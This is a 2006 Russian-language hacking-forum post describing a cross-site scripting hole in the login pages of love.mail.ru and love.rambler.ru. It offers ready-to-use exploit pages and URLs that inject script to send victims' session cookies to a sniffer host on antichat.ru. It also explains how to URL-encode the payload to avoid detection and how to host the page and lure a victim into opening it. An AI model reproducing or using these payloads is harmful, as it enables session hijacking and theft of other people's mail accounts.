HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу XSS mail.ru rambler.ru
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

XSS mail.ru rambler.ru
  #1  
Старый 04.12.2006, 20:40
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию XSS mail.ru rambler.ru
Гы гы ... долго же вы ждали темы как ломать эти почтовики =)

Старый добрый дядя slider вам расскроет тайну Да.. да... прям возьмём и угоним сессию..

Короче ... дело было вечером .. делать было нечего..
и полез я искать уязвимости на этих почтовиках..

После многих часов поиска (уважайте чужой труд! ) нашол таки...
в файле http://love.mail.ru/my/login.phtml скрытую строку:
Код HTML:
<input type="hidden" name="tcurl">
Да да... именно она слабое звено!...
паразитка такая не фильтруетсо =)

вбил я в нее "><script>alert()</script> и вылез заветный алерт!..


А вот тут по сценарию вам надо дать exploit ))
С переадрессацией и со всеми наворотами ))

А вот он б*я =)

майл.ru

Код HTML:
<body onload="p.submit()">
<form action="http://love.mail.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.mail.ru")</script>'>
рамблер.ru


Код HTML:
<body onload="p.submit()">
<form action="http://love.rambler.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.rambler.ru")</script>'>

СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ?

А вот причём... кука прийдёт и от лов и от майла! =)
Так что статейка думаю многим пригодистя =)

Ну что.. время пошло кто не успел тот опоздал... =)
Торопитесь время акции ограничего =)

С уважением slider


Ахх да... как юзать ))
Сохраняете этот "сплойт" в html и качаете на народ.ru
далее даёте ссылку комунить на свой "скрипт"... ))
Удачи!..

Вот вам ещё скриптеГ =)

Код HTML:
http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>
Чтоб было меньше палева .. кодируем это .. и получисо чтот типа того!..

Код HTML:
http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось slider; 05.12.2006 в 17:48..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Реализация XSS на rambler.ru Майор Уязвимости Mail-сервис 8 21.09.2006 20:50
Xss на mail.ru em00s7 Уязвимости Mail-сервис 14 08.06.2006 00:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.